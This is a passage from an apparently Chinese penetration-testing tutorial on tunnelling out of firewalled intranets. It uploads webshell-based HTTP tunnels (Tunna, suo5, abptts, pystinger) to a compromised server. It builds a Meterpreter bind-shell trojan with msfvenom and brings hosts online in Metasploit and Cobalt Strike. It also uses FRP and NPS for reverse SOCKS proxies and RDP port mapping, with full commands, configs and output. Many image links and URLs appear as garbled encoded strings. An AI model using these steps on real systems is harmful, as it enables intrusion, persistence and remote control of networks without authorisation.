9e3K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8e0b7f1y4t1M7f1A6m8b7f1u0i4h3f1&6g2P5p5u0E0e0e0j5&6y4g2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

他在本地开放一个1010端口，我们使用nc进行连接

nc -vv 127.0.0.1 1010

ff2K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8e0b7g2W2Y4P5p5N6m8b7f1q4V1c8q4)9J5k6p5S2Q4y4h3k6Q4y4h3j5$3N6K6t1@1x3q4)9J5k6i4m8F1k6H3`.`." alt="image.png" />

将本地的6666端口映射到远程的3389端口

[createTunnel]6666:127.0.0.1:3389

3d9K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8e0b7f1E0B7M7@1S2m8b7f1q4&6K9@1W2b7k6Y4y4j5M7K6l9H3x3q4)9J5k6i4m8F1k6H3`.`." alt="image.png" />

成功连接

3d5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8e0b7f1V1^5L8i4y4m8b7f1u0K6d9#2t1H3c8Y4t1J5d9e0x3I4z5g2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

Tunna

Tunna是2014年出品的一款基于HTTP隧道工具，可对任何通过 HTTP 的 TCP 通信进行包装和隧道传输 项目地址：GitHub - SECFORCE/Tunna: Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments. 将脚本上传到网站目录，访问结果如下

144K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8e0b7f1S2K6L8X3N6m8b7f1q4U0j5f1E0G2h3q4)9J5k6q4k6q4y4U0M7$3i4K6u0W2M7r3&6Y4" alt="image.png" />

将远程的3389转发到本地的1234端口

python proxy.py -u 6aaK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5&6x3W2)9J5k6e0p5$3z5q4)9J5k6e0y4Q4x3X3f1I4x3K6u0Q4x3@1p5^5x3o6R3H3i4K6u0r3j5$3!0F1L8W2)9J5k6h3A6K6M7q4)9J5y4X3&6T1M7%4m8Q4x3@1u0Q4x3X3c8D9i4K6t1$3L8X3u0K6M7q4)9K6b7U0p5J5x3K6c8Q4x3U0k6F1j5Y4y4H3i4K6y4n7i4K6u0V1M7W2)9J5y4X3&6T1M7%4m8Q4x3@1t1K6x3K6R3&6i4K6t1$3L8X3u0K6M7q4)9K6b7W2)9J5k6s2y4Q4x3U0k6F1j5Y4y4H3i4K6y4n7i4K6u0V1N6R3`.`.

该软件不稳定，慎用

suo5

suo5 是一个全新的 HTTP 代理隧道，基于 HTTP/1.1 的 Chunked-Encoding 构建。相比 Neo-reGeorg 等传统隧道工具, suo5 的性能可以达到其数十倍。目前仅支持jsp 将脚本上传到对应的网站目录，访问如下

799K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8e0b7g2x3K6e0f1S2m8b7f1q4S2N6%4S2%4L8q4f1%4z5o6x3@1y4#2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

使用客户端连接生成启动socks

suo5-windows-amd64.exe -t e9bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5&6x3W2)9J5k6e0p5$3z5q4)9J5k6e0y4Q4x3X3f1I4x3K6u0Q4x3@1p5^5x3o6R3H3i4K6u0r3M7%4g2G2y4g2)9J5k6h3A6K6M7q4)9J5y4X3&6T1M7%4m8Q4x3@1u0Q4x3X3c8D9i4K6t1$3L8X3u0K6M7q4)9K6b7U0m8Q4x3X3f1H3i4K6u0W2x3q4)9J5k6e0m8Q4x3@1p5%4y4K6R3^5i4K6t1$3L8X3u0K6M7q4)9K6b7W2)9J5k6q4)9J5k6r3q4#2N6r3S2Q4x3U0k6F1j5Y4y4H3i4K6y4n7N6r3g2K6N6q4)9K6b7i4c8W2M7%4b7I4x3U0x3`.

ee2K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8e0b7f1R3K6L8$3g2m8b7f1y4%4N6K6k6K6d9@1!0p5L8K6l9K6z5g2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

配置好代理，成功连接

24fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8e0b7f1c8b7c8@1E0m8b7f1g2d9N6g2y4E0P5X3S2i4M7K6x3I4y4W2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

上线MSF与CS

上线MSF

使用abptts将远程的8888端口映射到vps的7777端口

python2 abpttsclient.py -c webshell/config.txt -u ca7K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5&6x3W2)9J5k6e0p5$3z5q4)9J5k6e0y4Q4x3X3f1I4x3K6u0Q4x3@1p5^5x3o6R3H3i4K6u0r3j5h3u0H3N6s2c8K6i4K6u0W2K9Y4y4H3i4K6t1$3L8X3u0K6M7q4)9K6b7W2)9J5k6r3k6Q4x3U0k6F1j5Y4y4H3i4K6y4n7x3e0t1%4i4K6u0W2x3q4)9J5k6e0m8Q4x3X3f1I4i4K6y4m8y4K6M7%4y4#2)9J5c8U0p5J5y4#2)9J5k6e0m8Q4x3X3f1H3i4K6u0W2x3g2)9K6b7e0R3^5z5o6R3`.

kali生成正向木马，让端口设置为8888，这样msf访问7777会通过HTTP隧道转发到8888上从而绕过防火墙

msfvenom -p windows/x64/meterpreter/bind_tcp lport=8888 -f exe >shell.exe

MSF配置好exp

be6K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8e0b7f1W2^5c8f1N6m8b7f1y4V1e0#2S2W2K9%4A6&6x3o6p5$3y4q4)9J5k6i4m8F1k6H3`.`." alt="image.png" />

成功上线

849K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8e0b7g2q4A6L8@1c8m8b7f1b7%4k6@1@1J5M7%4k6S2z5o6f1$3x3W2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

上线msf写完之后我才意识到根本不用这么麻烦，越想越不对劲，他是不出网不是不入网，直接正向代理连过去就行了，也不需要上面的端口转发。。。。。只能说作为一种思路参考吧。。。。

上线cs

项目地址：GitHub - FunnyWolf/pystinger: Bypass firewall for traffic forwarding using webshell 一款使用webshell进行流量转发的出网工具 使用该项目可以上线cs

• proxy.jsp上传到目标服务器,确保 680K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3g2^5j5h3#2H3L8r3g2Q4x3X3g2U0L8$3#2Q4x3@1p5^5x3o6R3H3i4K6u0r3M7s2u0G2P5s2W2Q4x3X3g2B7M7%4l9`. 可以访问,页面返回 UTF-8
• 将stinger_server.exe上传到目标服务器,蚁剑/冰蝎执行start D:/XXX/stinger_server.exe启动服务端

不要直接运行D:/XXX/stinger_server.exe,会导致tcp断连

• vps执行./stinger_client -w 46cK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3g2^5j5h3#2H3L8r3g2Q4x3X3g2U0L8$3#2Q4x3@1p5^5x3o6R3H3i4K6u0r3M7s2u0G2P5s2W2Q4x3X3g2B7M7%4l9`. -l 127.0.0.1 -p 60000
• 如下输出表示成功

root@kali:~# ./stinger_client -w e6aK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3g2^5j5h3#2H3L8r3g2Q4x3X3g2U0L8$3#2Q4x3@1p5^5x3o6R3H3i4K6u0r3M7s2u0G2P5s2W2Q4x3X3g2B7M7%4m8Q4x3U0k6F1j5Y4y4H3i4K6y4n7i4K6u0V1L8q4)9J5y4X3&6T1M7%4m8Q4x3@1t1I4x3U0N6Q4x3X3f1H3i4K6u0W2x3q4)9J5k6e0q4Q4x3U0k6F1j5Y4y4H3i4K6y4n7i4K6u0V1M7q4)9J5y4X3&6T1M7%4m8Q4x3@1t1$3x3o6l9H3x3l9`.`.
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - 568K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3g2^5j5h3#2H3L8r3g2Q4x3X3g2U0L8$3#2Q4x3@1p5^5x3o6R3H3i4K6u0r3M7s2u0G2P5s2W2Q4x3X3g2B7M7%4l9`.
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept

• 此时已经在vps127.0.0.1:60000启动了一个example.com所在内网的socks4a代理
• 此时已经将目标服务器的127.0.0.1:60020映射到vps的127.0.0.1:60020

cobalt strike单主机上线

• proxy.jsp上传到目标服务器,确保 bffK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3g2^5j5h3#2H3L8r3g2Q4x3X3g2U0L8$3#2Q4x3@1p5^5x3o6R3H3i4K6u0r3M7s2u0G2P5s2W2Q4x3X3g2B7M7%4l9`. 可以访问,页面返回 UTF-8
• 将stinger_server.exe上传到目标服务器,蚁剑/冰蝎执行start D:/XXX/stinger_server.exe启动服务端

不要直接运行D:/XXX/stinger_server.exe,会导致tcp断连

• stinger_client命令行执行./stinger_client -w b5aK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3g2^5j5h3#2H3L8r3g2Q4x3X3g2U0L8$3#2Q4x3@1p5^5x3o6R3H3i4K6u0r3M7s2u0G2P5s2W2Q4x3X3g2B7M7%4l9`. -l 127.0.0.1 -p 60000
• 如下输出表示成功

root@kali:~# ./stinger_client -w b6cK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3g2^5j5h3#2H3L8r3g2Q4x3X3g2U0L8$3#2Q4x3@1p5^5x3o6R3H3i4K6u0r3M7s2u0G2P5s2W2Q4x3X3g2B7M7%4m8Q4x3U0k6F1j5Y4y4H3i4K6y4n7i4K6u0V1L8q4)9J5y4X3&6T1M7%4m8Q4x3@1t1I4x3U0N6Q4x3X3f1H3i4K6u0W2x3q4)9J5k6e0q4Q4x3U0k6F1j5Y4y4H3i4K6y4n7i4K6u0V1M7q4)9J5y4X3&6T1M7%4m8Q4x3@1t1$3x3o6l9H3x3l9`.`.
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - 045K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3g2^5j5h3#2H3L8r3g2Q4x3X3g2U0L8$3#2Q4x3@1p5^5x3o6R3H3i4K6u0r3M7s2u0G2P5s2W2Q4x3X3g2B7M7%4l9`.
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept

• cobalt strike添加监听,端口选择输出信息RAT Config中的Handler/LISTEN中的端口(通常为60020),beacons为127.0.0.1
• 生成payload,上传到主机运行后即可上线

目标出网场景下的利用

FRP

FRP是一款简单、稳定高性能的内网反向代理工具，可以轻松的实现内网穿透。 下载地址：Releases · fatedier/frp

FRP进行反向socks代理

服务端 frps.ini

[common]
bind_addr = 0.0.0.0
bind_port = 7000  //客户端反连的端口
dashboard_addr = 0.0.0.0
dashboard_port = 7001  //开启仪表盘的端口
dashboard_user = root  //仪表盘登录账号
dashboard_pwd = root   //仪表盘登录密码
token = 0EDgBme3IdfeJSTd  //客户端反连验证token

检查配置文件是否正确 ./frps verify -c ./frps.ini 启动服务端 ./frps -c ./frps.ini

820K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8e0b7f1b7%4L8q4y4m8b7f1u0m8b7f1k6J5L8q4q4H3e0e0V1K6x3W2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

客户端 frpc.ini

[common]
server_addr = 192.168.3.128  //服务端ip
server_port = 7000   //服务端端口
token = 0EDgBme3IdfeJSTd   //认证token
pool_count = 5
health_check_type = tcp
health_check_interval_s = 100
[test]  //服务名称，可自定义
remote_port = 12345  //开启服务端12345当做socks端口
plugin = socks5  //使用socks5代理模块
use_encryption = true  //加密流量
use_compression = true  //压缩流量
plugin_user = admin  //socks连接账号
plugin_passwd = 123456  //socks连接密码

启动客户端 ./frpc -c ./frpc.ini

62bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8e0b7h3k6Q4x3X3b7J5e0f1q4m8b7W2y4b7j5#2A6w2x3i4W2u0y4K6j5#2i4K6u0W2M7r3&6Y4" alt="image.png" />

服务端也收到请求

1ccK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8i4b7h3x3I4y4p5#2m8b7f1u0F1h3p5f1^5P5U0S2C8e0e0x3H3z5g2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

成功连接socks服务

eeaK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8i4b7g2q4I4y4q4W2m8b7f1y4S2N6p5g2r3L8q4y4G2L8K6j5#2y4q4)9J5k6i4m8F1k6H3`.`." alt="image.png" />

我们之前开启了服务端的仪表盘可以浏览器访问查看状态

fa4K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8i4b7f1S2W2M7s2N6m8b7f1q4*7g2@1c8G2k6%4y4d9f1e0l9@1y4#2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

使用FRP进行端口映射

远程映射RDP端口 服务端 frps.ini 不变

[common]
bind_addr = 0.0.0.0
bind_port = 7000
dashboard_addr = 0.0.0.0
dashboard_port = 7001
dashboard_user = root
dashboard_pwd = root
token = 0EDgBme3IdfeJSTd

客户端 frpc.ini 将本地的3389端口映射到远程服务器的7788端口

[common]
server_addr = 192.168.3.128
server_port = 7000
token = 0EDgBme3IdfeJSTd
[RDP]
local_ip = 127.0.0.1
local_port = 3389
remote_port = 7788

mstsc连接服务器7788端口

189K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8i4b7f1I4n7b7V1c8m8b7f1u0F1z5p5q4H3h3e0m8i4c8e0l9^5y4W2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

成功登录

0c3K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8i4b7h3g2g2h3W2g2m8b7f1b7^5f1g2u0A6h3i4m8a6g2e0R3&6y4W2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

远程映射WEB端口 服务端不变，客户端配置如下

[common]
server_addr = 192.168.3.128
server_port = 7000
token = 0EDgBme3IdfeJSTd
[HTTP]
type = tcp
local_ip = 127.0.0.1
local_port = 80
remote_port = 7788

映射完成之后访问服务端7788端口

d37K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8i4b7f1&6J5L8K6g2m8b7f1q4$3c8@1#2Y4L8U0k6B7M7K6f1^5z5g2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

同理可以完成其他对端口的映射

NPS

下载地址：295K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6W2K9r3q4F1k6#2)9J5k6r3W2G2i4K6u0r3L8Y4m8K6i4K6u0r3M7X3g2D9k6h3q4K6k6i4y4Q4x3U0k6F1j5Y4y4H3i4K6y4n7NPS 是一款轻量级、高性能、功能强大的内网穿透代理服务器。支持tcp、udp 流量转发，可支持任何 tcp、udp 上层协议，此外还支持内网http代理、内网 socks5 代理、p2p 等，并带有功能强大的 web 管理端。 下载系统对应版本后 linux ./nps install windows nps.exe install 安装nps 默认配置文件在 nps/conf/nps.conf 记录了nps的监听端口，账号密码等 nps默认监听端口如下，如果端口有冲突记得修改端口

http_proxy_port：80
https_proxy_port：443
bridge_port ：8024
web_port ：8080

nps常用命令 nps start nps stop nps -version 默认登录端口是 8080 账号 admin 密码 123 新增nps客户端

2a6K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8i4b7f1#2u0d9s2A6m8b7f1y4A6c8q4)9J5k6q4t1I4e0i4u0q4y4U0f1$3i4K6u0W2M7r3&6Y4" alt="image.png" />

265K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8i4b7f1g2v1f1Y4S2m8b7f1q4&6j5$3p5I4i4K6u0V1d9U0c8u0y4e0j5#2i4K6u0W2M7r3&6Y4" alt="image.png" />

使用客户端连接，客户端只需要单独的exe文件，压缩包里的配置文件可以丢掉

npc.exe -server=192.168.3.128:8024 -vkey=mxkt13ximrr7o3d2

连接成功之后发现仪表盘里客户端已经显示为在线，这时候我们就可以对客户端做操作

3fbK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8i4b7g2y4*7z5h3&6m8b7f1q4&6h3X3I4^5M7W2c8b7g2e0x3H3z5q4)9J5k6i4m8F1k6H3`.`." alt="image.png" />

搭建nps反向socks代理

在socks代理新建socks代理，填写客户端id和服务器开放的socks端口即可

fa1K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8i4b7f1N6$3h3f1!0m8b7f1u0Q4y4h3k6K6c8%4R3^5L8f1!0m8z5e0M7K6i4K6u0W2M7r3&6Y4" alt="image.png" />

350K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8i4b7g2N6T1L8q4u0m8b7f1q4J5g2o6S2Q4x3X3c8@1f1r3p5@1x3K6R3^5i4K6u0W2M7r3&6Y4" alt="image.png" />

使用proxifier进行连接，用户名和密码是创建客户端时自定义的用户名

e0cK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8S2b7g2W2n7c8W2A6m8b7f1c8n7c8p5k6Q4x3X3c8I4z5p5H3@1y4o6j5H3i4K6u0W2M7r3&6Y4" alt="image.png" />

搭建tcp隧道进行端口映射

如果该端口只对内网开放，我们就可以把端口映射出来，当然也可以填写内网的其他主机，看自己的需求

6f6K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8S2b7g2c8@1z5o6y4m8b7f1y4%4M7$3q4U0L8q4S2@1f1e0j5I4y4#2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

连接成功，其他端口同理

da3K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8S2b7h3u0a6N6h3k6m8b7f1g2#2i4K6u0V1x3f1u0#2d9q4)9#2k6X3D9%4y4U0u0Q4x3X3g2H3L8X3M7`." alt="image.png" />

搭建UDP隧道进行端口映射

